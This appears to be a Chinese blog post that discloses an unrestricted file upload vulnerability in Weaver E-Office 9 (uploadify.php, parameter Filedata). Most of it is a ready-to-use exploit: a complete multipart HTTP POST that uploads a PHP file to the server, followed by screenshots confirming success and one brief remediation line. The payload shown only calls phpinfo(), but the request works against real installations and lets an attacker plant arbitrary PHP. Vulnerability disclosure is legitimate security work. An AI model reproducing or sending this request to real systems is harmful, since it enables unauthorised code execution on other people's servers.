泛微OA漏洞(附EXP)

2023/08/09 12:54 · 笔记 ·  原创文章 · 902阅读 · 0评论

0x01 前言

Weaver E-Office9版本存在代码问题漏洞,该漏洞源于文件/inc/jquery/uploadify/uploadify.php存在问题,对参数Filedata的操作会导致不受限制的上传

0x02 影响平台

  • 本地测试环境 v9.0

0x03 漏洞复现

还是辣个熟悉的页面~~

泛微OA漏洞(附EXP)  第1张

EXP:

POST /inc/jquery/uploadify/uploadify.php HTTP/1.1
Host: 192.168.232.137:8082
User-Agent: test
Connection: close
Content-Length: 493
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=25d6580ccbac7409f39b085b3194765e6e5adaa999d5cc85028bd0ae4b85

--25d6580ccbac7409f39b085b3194765e6e5adaa999d5cc85028bd0ae4b85
Content-Disposition: form-data; name="Filedata"; filename="666.php"
Content-Type: application/octet-stream

<?php phpinfo();?>

--25d6580ccbac7409f39b085b3194765e6e5adaa999d5cc85028bd0ae4b85--
--25d6580ccbac7409f39b085b3194765e6e5adaa999d5cc85028bd0ae4b85
Content-Disposition: form-data; name="file"; filename=""
Content-Type: application/octet-stream

--25d6580ccbac7409f39b085b3194765e6e5adaa999d5cc85028bd0ae4b85--

这个酱紫说明文件上传成功

泛微OA漏洞(附EXP)  第2张

success

泛微OA漏洞(附EXP)  第3张

0x04 修复方案

  • 该漏洞已向公众披露并可能被使用,建议及时更新至无漏洞版本。

本篇文章来源于微信公众号: 格格巫和蓝精灵

您可能感兴趣的文章

本文地址:http://www.ouyangxiaoze.com/2023/08/781.html
版权声明:本文为原创文章,版权归 欧阳小泽 所有,欢迎分享本文,转载请保留出处!
上一篇:
下一篇:

 发表评论


表情